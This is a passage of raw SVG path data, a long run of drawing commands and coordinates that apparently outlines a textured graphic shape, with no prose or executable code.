.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8